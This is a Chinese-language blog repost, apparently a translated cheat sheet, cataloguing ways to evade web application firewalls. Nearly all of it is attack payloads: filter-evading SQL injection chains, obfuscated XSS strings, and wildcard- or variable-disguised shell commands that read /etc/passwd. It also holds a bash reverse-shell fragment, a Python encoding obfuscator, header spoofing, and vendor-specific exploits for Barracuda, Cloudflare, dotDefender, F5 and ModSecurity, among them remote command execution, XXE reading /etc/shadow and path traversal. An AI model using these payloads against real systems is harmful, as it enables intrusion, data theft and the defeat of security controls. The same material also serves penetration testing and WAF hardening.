干货|各种WAF绕过手法学习
生活随笔
收集整理的這篇文章主要介紹了
干货|各种WAF绕过手法学习
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
0X00????Fuzz/爆破
fuzz字典
1.Seclists/Fuzzing
https://github.com/danielmiessler/SecLists/tree/master/Fuzzing
2.Fuzz-DB/Attack
https://github.com/fuzzdb-project/fuzzdb/tree/master/attack
3.Other Payloads 可能會被ban ip,小心為妙。
https://github.com/foospidy/payloads
0X01????正則繞過
多少waf 使用正則匹配。
黑名單檢測/bypass
Case: SQL 注入
? Step 1:
過濾關鍵詞: and, or, union 可能正則: preg_match('/(and|or|union)/i', $id) 被攔截的語句: union select user, password from usersbypass語句: 1 || (select user from users where user_id=1) = 'admin'? Step 2:
過濾關鍵詞: and, or, union, where 被攔截的語句: 1 || (select user from users where user_id = 1) = 'admin'bypass語句: 1 || (select user from users limit 1) = 'admin'? Step 3:
過濾關鍵詞: and, or, union, where, limit 被攔截的語句: 1 || (select user from users limit 1) = 'admin'bypass語句: 1 || (select user from users group by user_id having user_id=1) = 'admin'? Step 4:
過濾關鍵詞: and, or, union, where, limit, group by 被攔截的語句: 1 || (select user from users group by user_id having user_id = 1) = 'admin'bypass語句: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1? Step 5:
過濾關鍵詞: and, or, union, where, limit, group by, select被攔截的語句: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1bypass語句: 1 || 1 = 1 into outfile 'result.txt' bypass語句: 1 || substr(user,1,1) = 'a'? Step 6:
過濾關鍵詞: and, or, union, where, limit, group by, select, ' 被攔截的語句: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1bypass語句: 1 || user_id is not null bypass語句: 1 || substr(user,1,1) = 0x61 bypass語句: 1 || substr(user,1,1) = unhex(61)? Step 7:
過濾關鍵詞: and, or, union, where, limit, group by, select, ', hex 被攔截的語句: 1 || substr(user,1,1) = unhex(61)bypass語句: 1 || substr(user,1,1) = lower(conv(11,10,36))? Step 8:
過濾關鍵詞: and, or, union, where, limit, group by, select, ', hex, substr 被攔截的語句: 1 || substr(user,1,1) = lower(conv(11,10,36))bypass語句: 1 || lpad(user,7,1)? Step 9:
過濾關鍵詞: and, or, union, where, limit, group by, select, ', hex, substr, white space 被攔截的語句: 1 || lpad(user,7,1)bypass語句: 1%0b || %0blpad(user,7,1)0X02????????混淆/編碼
1. 大小寫
標準: <script>alert()</script> Bypassed: <ScRipT>alert()</sCRipT>標準: SELECT * FROM all_tables WHERE OWNER='DATABASE_NAME' Bypassed: sELecT * FrOm all_tables whERe OWNER = 'DATABASE_NAME'2. URL 編碼
被阻斷語句: <svG/x=">"/oNloaD=confirm()// Bypassed: %3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F被阻斷語句: uNIoN(sEleCT 1,2,3,4,5,6,7,8,9,10,11,12) Bypassed: uNIoN%28sEleCT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%293. Unicode 編碼
標準: <marquee onstart=prompt()> 混淆: <marquee onstart=\u0070r\u06f\u006dpt()>被阻斷語句: /?redir=http://google.com Bypassed: /?redir=http://google.com(Unicode 替代)被阻斷語句: <marquee loop=1 onfinish=alert()>x Bypassed: <marquee loop=1 onfinish=alert︵1)>x (Unicode 替代)TIP: 查看這些說明 this and this reports on HackerOne. :)4. HTML 實體編碼
標準: "><img src=x onerror=confirm()> Encoded: "><img src=x onerror=confirm()> (General form) Encoded: "><img src=x onerror=confirm()> (Numeric reference)5. 混合編碼
Sometimes, WAF rules often tend to filter out a specific type of encoding.This type of filters can be bypassed by mixed encoding payloads.Tabs and newlines further add to obfuscation.混淆:
<A HREF="h tt p://6 6.000146.0x7.147/">XSS</A>7. 雙重URL編碼
這個需要服務端多次解析了url編碼標準: http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\ 混淆: http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\標準: <script>alert()</script> 混淆: %253Cscript%253Ealert()%253C%252Fscript%253E8. 通配符使用
用于linux命令語句注入,通過shell通配符繞過標準: /bin/cat /etc/passwd 混淆: /???/??t /???/??ss?? Used chars: / ? t s標準: /bin/nc 127.0.0.1 1337 混淆: /???/n? 2130706433 1337 Used chars: / ? n [0-9]9. 動態payload 生成
標準: <script>alert()</script> 混淆: <script>eval('al'+'er'+'t()')</script>標準: /bin/cat /etc/passwd 混淆: /bi'n'''/c''at' /e'tc'/pa''ss'wdBash allows path concatenation for execution.標準: <iframe/onload='this["src"]="javascript:alert()"';> 混淆: <iframe/onload='this["src"]="jav"+"as	cr"+"ipt:al"+"er"+"t()"';>9. 垃圾字符
Normal payloads get filtered out easily. Adding some junk chars helps avoid detection (specific cases only). They often help in confusing regex based firewall標準: <script>alert()</script> 混淆: <script>+-+-1-+-+alert(1)</script>標準: <BODY onload=alert()> 混淆: <BODY onload!#$%$()*~+-_.,:;?@[/|\]^`=alert()> NOTE: 上述語句可能會破壞正則的匹配,達到繞過。 標準: <a href=javascript;alert()>ClickMe Bypassed: <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe10. 插入換行符
部分waf可能會對換行符沒有匹配標準: <iframe src=javascript:confirm(0)"> 混淆: <iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(0)">11. 未定義變量
bash 和 perl 執行腳本中加入未定義變量,干擾正則。 TIP: 隨便寫個不存在的變量就好。$aaaa,$sdayuhjbsad,$dad2ed都可以。 Level 1 Obfuscation: Normal 標準: /bin/cat /etc/passwd 混淆: /bin/cat$u /etc/passwd$uLevel 2 Obfuscation: Postion Based 標準: /bin/cat /etc/passwd 混淆: $u/bin$u/cat$u $u/etc$u/passwd$uLevel 3 Obfuscation: Random characters 標準: /bin/cat /etc/passwd 混淆: $aaaaaa/bin$bbbbbb/cat$ccccccc $dddddd/etc$eeeeeee/passwd$fffffff一個精心制作的payload$sdijchkd/???$sdjhskdjh/??t$skdjfnskdj $sdofhsdhjs/???$osdihdhsdj/??ss??$skdjhsiudf12. Tab 鍵和換行符
大多數waf匹配的是空格不是Tab標準: <IMG SRC="javascript:alert();"> Bypassed: <IMG SRC=" javascript:alert();"> 變形: <IMG SRC=" jav ascri pt:alert ();">標準: http://test.com/test?id=1 union select 1,2,3 標準: http://test.com/test?id=1%09union%23%0A%0Dselect%2D%2D%0A%0D1,2,3標準: <iframe src=javascript:alert(1)></iframe> 混淆:<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>13. Token Breakers(翻譯不了 看起來說的就是sql注入閉合)
Attacks on tokenizers attempt to break the logic of splitting a request into tokens with the help of token breakers. Token breakers are symbols that allow affecting the correspondence between an element of a string and a certain token, and thus bypass search by signature. However, the request must still remain valid while using token-breakers. Case: Unknown Token for the TokenizerPayload: ?id=‘-sqlite_version() UNION SELECT password FROM users --Case: Unknown Context for the Parser (Notice the uncontexted bracket)Payload 1: ?id=123);DROP TABLE users --Payload 2: ?id=1337) INTO OUTFILE ‘xxx’ --TIP:?更多payload可以看這里?cheat sheet.
14. 其他格式混淆
許多web應用程序支持不同的編碼類型(如下表)混淆成服務器可解析、waf不可解析的編碼類型Case: IIS
IIS6, 7.5, 8 and 10 (ASPX v4.x) 允許 IBM037 字符 可以發送編碼后的參數名和值原始請求:
POST /sample.aspx?id1=something HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded; charset=utf-8 Content-Length: 41id2='union all select * from users--混淆請求+URL Encoding:
POST /sample.aspx?%89%84%F1=%A2%96%94%85%A3%88%89%95%87 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded; charset=ibm037 Content-Length: 115%89%84%F2=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60TIP:?可以使用?這個小腳本?來轉化編碼
import urllib.parse, sys from argparse import ArgumentParser lackofart = '''OBFUSCATOR '''def paramEncode(params="", charset="", encodeEqualSign=False, encodeAmpersand=False, urlDecodeInput=True, urlEncodeOutput=True):result = ""equalSign = "="ampersand = "&"if '=' and '&' in params:if encodeEqualSign:equalSign = equalSign.encode(charset)if encodeAmpersand:ampersand = ampersand.encode(charset)params_list = params.split("&")for param_pair in params_list:param, value = param_pair.split("=")if urlDecodeInput:param = urllib.parse.unquote(param)value = urllib.parse.unquote(value)param = param.encode(charset)value = value.encode(charset)if urlEncodeOutput:param = urllib.parse.quote_plus(param)value = urllib.parse.quote_plus(value)if result:result += ampersandresult += param + equalSign + valueelse:if urlDecodeInput:params = urllib.parse.unquote(params)result = params.encode(charset)if urlEncodeOutput:result = urllib.parse.quote_plus(result)return resultdef main():print(lackofart)parser = ArgumentParser('python3 obfu.py')parser._action_groups.pop()# A simple hack to have required arguments and optional arguments separatelyrequired = parser.add_argument_group('Required Arguments')optional = parser.add_argument_group('Optional Arguments')# Required Optionsrequired.add_argument('-s', '--str', help='String to obfuscate', dest='str')required.add_argument('-e', '--enc', help='Encoding type. eg: ibm037, utf16, etc', dest='enc')# Optional Arguments (main stuff and necessary)optional.add_argument('-ueo', help='URL Encode Output', dest='ueo', action='store_true')optional.add_argument('-udi', help='URL Decode Input', dest='udi', action='store_true')args = parser.parse_args()if not len(sys.argv) > 1:parser.print_help()quit()print('Input: %s' % (args.str))print('Output: %s' % (paramEncode(params=args.str, charset=args.enc, urlDecodeInput=args.udi, urlEncodeOutput=args.ueo)))if __name__ == '__main__':main()| 可用編碼 | 說明 | |
| Nginx, uWSGI-Django-Python3 | IBM037, IBM500, cp875, IBM1026, IBM273 | 對參數名和參數值進行編碼,服務器會對參數名和參數值均進行url解碼,需要對等號和& and進行編碼(不進行url編碼) |
| Nginx, uWSGI-Django-Python2 | IBM037, IBM500, cp875, IBM1026, utf-16, utf-32, utf-32BE, IBM424 | 對參數名和參數值進行便慢慢 服務器會對參數名和參數值均進行url解碼 等號和&符號不應該以任何方式編碼。 |
| Apache-TOMCAT8-JVM1.8-JSP | IBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025 | 參數名按原始格式(可以像往常一樣使用url編碼)Body不論是否經過url編碼均可 等號和&符號不應該以任何方式編碼 |
| Apache-TOMCAT7-JVM1.6-JSP | IBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025 | 參數名按原始格式(可以像往常一樣使用url編碼) Body 不論是否經過url編碼均可 等號和&符號不應該以任何方式編碼 |
| IIS6, 7.5, 8, 10 -ASPX (v4.x) | IBM037, IBM500, IBM870, cp875, IBM1026, IBM01047, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, unicodeFFFE, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420,IBM423, IBM424, x-EBCDIC-KoreanExtended, IBM-Thai, IBM871, IBM880, IBM905, IBM00924, cp1025 | 參數名按原始格式(可以像往常一樣使用url編碼) Body 不論是否經過url編碼均可 等號和&符號不應該以任何方式編碼 |
0X04????????HTTP 參數污染
手法
這種攻擊方法基于服務器如何解釋具有相同名稱的參數 可能造成bypass的情況: 服務器使用最后接收到的參數,WAF只檢查第一個參數 服務器將來自類似參數的值聯合起來,WAF單獨檢查它們下面是相關服務器對參數解釋的比較
| ASP/IIS | 用逗號連接 | par1=val1,val2 |
| JSP, Servlet/Apache Tomcat | 第一個參數是結果 | par1=val1 |
| ASP.NET/IIS | 用逗號連接 | par1=val1,val2 |
| PHP/Zeus | 最后一個參數是結果 | par1=val2 |
| PHP/Apache | 最后一個參數是結果 | par1=val2 |
| JSP, Servlet/Jetty | 第一個參數是結果 | par1=val1 |
| IBM Lotus Domino | 第一個參數是結果 | par1=val1 |
| IBM HTTP Server | 最后一個參數是結果 | par1=val2 |
| mod_perl, libapeq2/Apache | 第一個參數是結果 | par1=val1 |
| Oracle Application Server 10G | 第一個參數是結果 | par1=val1 |
| Perl CGI/Apache | 第一個參數是結果 | par1=val1 |
| Python/Zope | 第一個參數是結果 | par1=val1 |
| IceWarp | 返回一個列表 | [‘val1’,’val2’] |
| AXIS 2400 | 最后一個參數是結果 | par1=val2 |
| DBMan | 由兩個波浪號連接起來 | par1=val1~~val2 |
| mod-wsgi (Python)/Apache | 返回一個列表 | ARRAY(0x8b9058c) |
0X05????????瀏覽器的缺陷
Charset Bugs:
可以嘗試 修改 charset header to 更高的 Unicode(eg. UTF-32) 當網站解碼的時候,觸發payloadExample request:
GET /page.php?p=???script?alert(1)?/script? HTTP/1.1 Host: site.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0 Accept-Charset:utf-32; q=0.5< Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate當站點加載時,將其編碼為我們設置的UTF-32編碼,然后由于頁面的輸出編碼為UTF-8,將其呈現為: "<script>alert(1)</script>從而觸發xss。
完成url編碼后的payload:
%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80Null 空字節
空字節通常用作字符串終止符
Payload 示例:<scri%00pt>alert(1);</scri%00pt> <scri\x00pt>alert(1);</scri%00pt> <s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t> 標準: <a href="javascript:alert()"> 混淆: <a href="ja0x09vas0x0A0x0Dcript:alert(1)">clickme</a> 變形: <a 0x00 href="javascript:alert(1)">clickme</a>解析錯誤
RFC 聲明節點名不可以由空白起始但是我們可以使用特殊字符 ` %, //, !, ?`, etc.例子:<// style=x:expression\28write(1)\29> - Works upto IE7 (Source)<!--[if]><script>alert(1)</script --> - Works upto IE9 (Reference)<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/> - Works in IE7 (Reference)<%div%20style=xss:expression(prompt(1))> - Works Upto IE7Unicode 分隔符
-
每個瀏覽器有不同的分隔分隔符
@Masato Kinugawafuzz 后發現如下
IExplorer: 0x09, 0x0B, 0x0C, 0x20, 0x3BChrome: 0x09, 0x20, 0x28, 0x2C, 0x3BSafari: 0x2C, 0x3BFireFox: 0x09, 0x20, 0x28, 0x2C, 0x3BOpera: 0x09, 0x20, 0x2C, 0x3BAndroid: 0x09, 0x20, 0x28, 0x2C, 0x3B示例
<a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B'>pwn3d使用其他非典型等效語法結構替換
找的"waf開發人員沒有注意到的"語句進行攻擊
一些WAF開發人員忽略的常見關鍵字:
-
JavaScript functions:
-
window
-
parent
-
this
-
self
-
-
Tag attributes:
-
onwheel
-
ontoggle
-
onfilterchange
-
onbeforescriptexecute
-
ondragstart
-
onauxclick
-
onpointerover
-
srcdoc
-
SQL Operators
lpad
lpad(string, padded_length, [ pad_string ] ) lpad函數從左邊對字符串使用指定的字符進行填充 lpad('tech', 7); 將返回' tech'lpad('tech', 2); 將返回'te'lpad('tech', 8, '0'); 將返回'0000tech'lpad('tech on the net', 15, 'z'); 將返回'tech on the net'lpad('tech on the net', 16, 'z'); 將返回'ztech on the netfield
FIELD(str,str1,str2,str3,...) 返回的索引(從1開始的位置)的str在str1,str2,STR3,...列表中。如果str沒有找到,則返回0。 +---------------------------------------------------------+ | FIELD('ej', 'Hej', 'ej', 'Heja', 'hej', 'foo') | +---------------------------------------------------------+ | 2 | +---------------------------------------------------------+bit_count?二進制數中包含1的個數。BIT_COUNT(10);因為10轉成二進制是1010,所以該結果就是2
示例payloads:
Case: XSS <script>window['alert'](0)</script> <script>parent['alert'](1)</script> <script>self['alert'](2)</script> Case: SQLi SELECT if(LPAD(' ',4,version())='5.7', sleep(5),null); 1%0b||%0bLPAD(USER,7,1) 可以使用許多替代原生Javascript的方法: JSFuck JJEncode XChars.JS濫用SSL/TLS密碼:
很多時候,服務器可以接收各種SSL/TLS密碼和版本的連接。 初始化到waf不支持的版本 找出waf支持的密碼(通常WAF供應商文檔對此進行了討論)。 找出服務器支持的密碼(SSLScan這種工具可以幫助到你)。 找出服務器支持但waf不支持的Tool:?abuse-ssl-bypass-waf
濫用 DNS 記錄:
-
找到云waf后的源站
TIP:?一些在線資源?IP History?和?DNS Trails
Tool:?bypass-firewalls-by-DNS-history
bash bypass-firewalls-by-DNS-history.sh?-d?<target>?--checkall請求頭欺騙
讓waf以為請求來自于內部網絡,進而不對其進行過濾。
添加如下請求頭
X-Originating-IP: 127.0.0.1 X-Forwarded-For: 127.0.0.1 X-Remote-IP: 127.0.0.1 X-Remote-Addr: 127.0.0.1 X-Client-IP: 127.0.0.1Google Dorks Approach:
應對已知WAF的繞過
搜索語法:
Normal search:
+<wafname> waf bypass
Searching for specific version exploits:
"<wafname> <version>" (bypass|exploit)
For specific type bypass exploits:
"<wafname>" +<bypass type> (bypass|exploit)
On?Exploit DB:
site:exploit-db.com +<wafname> bypass
On?0Day Inject0r DB:
site:0day.today +<wafname> <type> (bypass|exploit)
On?Twitter:
site:twitter.com +<wafname> bypass
On?Pastebin
site:pastebin.com +<wafname> bypass
0X06? ? 拓展Bypass姿勢
Airlock Ergon
SQLi Overlong UTF-8 Sequence Bypass (>= v4.2.4) by @Sec Consult%C0%80'+union+select+coll,col2,col3+from+table+--+AWS
SQLi Bypass?by?@enkaskal
"; select * from TARGET_TABLE --XSS Bypass?by?@kmkz
<script>eval(atob(decodeURIComponent("payload")))Barracuda
Cross Site Scripting by?@WAFNinja
<body style="height:1000px" onwheel="alert(1)"> <div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)"> <b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>HTML Injection by?@Global-Evolution
GET /cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_type=ftp&&backup_life=5&&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net%20width%3D800%20height%3D800%3E&&user=guest&&password=121c34d4e85dfe6758f31ce2d7b763e7&&et=1261217792&&locale=en_US Host: favoritewaf.com User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)XSS Bypass by?@0xInfection
<a href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:open()>clickhereBarracuda WAF 8.0.1 - Remote Command Execution (Metasploit) by @xort
Barracuda Spam & Virus Firewall 5.1.3 - Remote Command Execution (Metasploit)?by?@xort
Cerber (WordPress)
Username Enumeration Protection Bypass by HTTP Verb Tampering by?@ed0x21son
POST host.com HTTP/1.1 Host: favoritewaf.com User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)author=1Protected Admin Scripts Bypass by?@ed0x21son
http://host/wp-admin///load-scripts.php?load%5B%5D=jquery-core,jquery-migrate,utils http://host/wp-admin///load-styles.php?load%5B%5D=dashicons,admin-barREST API Disable Bypass by?@ed0x21son
http://host/index.php/wp-json/wp/v2/users/Citrix NetScaler
SQLi via HTTP Parameter Pollution (NS10.5) by?@BGA Security
<soapenv:Envelope?xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"?xmlns:tem="http://tempuri.org/"><soapenv:Header/><soapenv:Body><string>’ union select current_user,?2#</string></soapenv:Body> </soapenv:Envelope>generic_api_call.pl?XSS?by?@NNPoster
http://host/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3cscript%3e?
Cloudflare
HTML Injection?by?@spyerror
<div?style="background:url(/f#oo/;color:red/*/foo.jpg);">XXSS Bypass?by?@c0d3g33k
<a+HREF='javascrip%26%239t:alert%26lpar;document.domain)'>test</a>XSS Bypasses?by?@Bohdan Korzhynskyi
<svg?onload=prompt%26%230000000040document.domain)> <svg?onload=prompt%26%23x000000028;document.domain)> xss'"><iframe?srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'> 1'"><img/src/onerror=.1|alert``>XSS Bypass?by?@RakeshMane10
<svg/onload=alert()//XSS Bypass?by?@ArbazKiraak
<a?href="j	a	v	asc
ri	pt:\u0061\u006C\u0065\u0072\u0074(this['document']['cookie'])">X</a>`XSS Bypass by?@Ahmet ümit
<--`<img/src=`?onerror=confirm``> --!>XSS Bypass?by?@Shiva Krishna
javascript:{alert`0`}XSS Bypass?by?@Brute Logic
<base?href=//knoxss.me?XSS Bypass?by?@RenwaX23?(Chrome only)
<j?id=x?style="-webkit-user-modify:read-write"?onfocus={window.onerror=eval}throw/0/+name>H</j>#xRCE Payload Detection Bypass?by?@theMiddle
cat$u+/etc$u/passwd$u /bin$u/bash$u?<ip> <port> ";cat+/etc/passwd+#Comodo
XSS Bypass by?@0xInfection
<input/oninput='new Function`confir\u006d\`0\``'> <p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragmeSQLi by?@WAFNinja
0 union/**/select?1,version(),@@datadirDotDefender
Firewall disable by (v5.0) by?@hyp3rlinx
PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+ <enabled>false</enabled>Remote Command Execution (v3.8-5) by?@John Dos
POST?/dotDefender/index.cgi?HTTP/1.1 Host: 172.16.159.132 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Authorization: Basic YWRtaW46 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Content-Length: 95sitename=dotdefeater&deletesitename=dotdefeater;id;ls -al ../;pwd;&action=deletesite&linenum=15Persistent XSS (v4.0) by?@EnableSecurity
GET /c?a=<script>?HTTP/1.1 Host: 172.16.159.132 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 <script>alert(1)</script>: aa Keep-Alive: 300R-XSS Bypass by?@WAFNinja
<svg/onload=prompt(1);> <isindex?action="javas&tab;cript:alert(1)"?type=image> <marquee/onstart=confirm(2)>XSS Bypass by?@0xInfection
<p?draggable=True?ondragstart=prompt()>alert <bleh/ondragstart=	parent	['open']	()%20draggable=True>dragme GET - XSS Bypass (v4.02) by @DavidK/search?q=%3Cimg%20src=%22WTF%22%20onError=alert(/0wn3d/.source)%20/%3E<img?src="WTF"?onError="{var {3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v%2Ba%2Be%2Bs](e%2Bs%2Bv%2B h%2Bn)(/0wn3d/.source)"?/>POST - XSS Bypass (v4.02) by?@DavidK
<img src="WTF"?onError="{var {3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/0wn3d/ .source)" />clave?XSS (v4.02) by?@DavidK
/?&idPais=3&clave=%3Cimg%20src=%22WTF%22%20onError=%22{Fortinet Fortiweb
pcre_expression?unvaidated XSS by?@Benjamin Mejri
/waf/pcre_expression/validate?redir=/success&mkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C /waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C&mkey=0CSP Bypass by?@Binar10
POST Type Query
POST?/<path>/login-app.aspx?HTTP/1.1 Host: <host> User-Agent: <any valid user agent string> Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: <the content length must be at least 2399 bytes>var1=datavar1&var2=datavar12&pad=<random data to complete at least?2399?bytes>GET Type Query
http://<domain>/path?var1=vardata1&var2=vardata2&pad=<large arbitrary data>F5 ASM
?
XSS Bypass by?@WAFNinja
<table?background="javascript:alert(1)"></table> "/><marquee?onfinish=confirm(123)>a</marquee>F5 BIG-IP
XSS Bypass by?@WAFNinja
<body?style="height:1000px"?onwheel="[DATA]"> <div?contextmenu="xss">Right-Click Here<menu?id="xss"?onshow="[DATA]"> <body?style="height:1000px"?onwheel="prom%25%32%33%25%32%36x70;t(1)"> <div?contextmenu="xss">Right-Click Here<menu?id="xss"?onshow="prom%25%32%33%25%32%36x70;t(1)">XSS Bypass by?@Aatif Khan
<body style="height:1000px"?onwheel="prom%25%32%33%25%32%36x70;t(1)"> <div contextmenu="xss">Right-Click Here<menu?id="xss"onshow="prom%25%32%33%25%32%36x70;t(1)“>report_type?XSS?by?@NNPoster
https://host/dms/policy/rep_request.php?report_type=%22%3E%3Cbody+onload=alert(%26quot%3BXSS%26quot%3B)%3E%3Cfoo+POST Based XXE by?@Anonymous
POST?/sam/admin/vpe2/public/php/server.php?HTTP/1.1 Host: bigip Cookie: BIGIPAuthCookie=*VALID_COOKIE* Content-Length: 143<?xml version="1.0"?encoding='utf-8'??> <!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]> <message><dialogueType>&e;</dialogueType></message>Directory Traversal by?@Anastasios Monachos
Read Arbitrary File
/tmui/Control/jspmap/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwdDelete Arbitrary File
POST?/tmui/Control/form?HTTP/1.1 Host: site.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: JSESSIONID=6C6BADBEFB32C36CDE7A59C416659494; f5advanceddisplay=""; BIGIPAuthCookie=89C1E3BDA86BDF9E0D64AB60417979CA1D9BE1D4; BIGIPAuthUsernameCookie=admin; F5_CURRENT_PARTITION=Common; f5formpage="/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd"; f5currenttab="main"; f5mainmenuopenlist=""; f5_refreshpage=/tmui/Control/jspmap/tmui/system/archive/properties.jsp%3Fname%3D../../../../../etc/passwd Content-Type: application/x-www-form-urlencoded_form_holder_opener_=&handler=%2Ftmui%2Fsystem%2Farchive%2Fproperties&handler_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&showObjList=&showObjList_before=&hideObjList=&hideObjList_before=&enableObjList=&enableObjList_before=&disableObjList=&disableObjList_before=&_bufvalue=icHjvahr354NZKtgQXl5yh2b&_bufvalue_before=icHjvahr354NZKtgQXl5yh2b&_bufvalue_validation=NO_VALIDATION&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Farchive%2Fproperties&com.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&linked_add_id=&linked_add_id_before=&name=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&name_before=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&form_page=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&download_before=Download%3A+..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&restore_before=Restore&delete=Delete&delete_before=DeleteF5 FirePass
SQLi Bypass from?@Anonymous
state=%2527+and+ (case+when+SUBSTRING(LOAD_FILE(%2527/etc/passwd%2527),1,1)=char(114)+then+ BENCHMARK(40000000,ENCODE(%2527hello%2527,%2527batman%2527))+else+0+end)=0+--+ModSecurity
RCE Payloads Detection Bypass for PL3?by?@theMiddle?(v3.1)
;+$u+cat+/etc$u/passwd$uRCE Payloads Detection Bypass for PL2?by?@theMiddle?(v3.1)
;+$u+cat+/etc$u/passwd+\#RCE Payloads for PL1 and PL2?by?@theMiddle?(v3.0)
/???/??t+/???/??ss??RCE Payloads for PL3?by?@theMiddle?(v3.0)
/?in/cat+/et?/passw?SQLi Bypass?by?@Johannes Dahse?(v2.2)
0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_userSQLi Bypass?by?@Yuri Goltsev?(v2.2)
1 AND (select?DCount(last(username)&after=1&after=1)?from?users?where?username='ad1min')SQLi Bypass?by?@Ahmad Maulana?(v2.2)
1'UNION/*!0SELECT user,2,3,4,5,6,7,8,9/*!0from/*!0mysql.user/*-SQLi Bypass?by?@Travis Lee?(v2.2)
amUserId=1 union?select?username,password,3,4?from?usersSQLi Bypass?by?@Roberto Salgado?(v2.2)
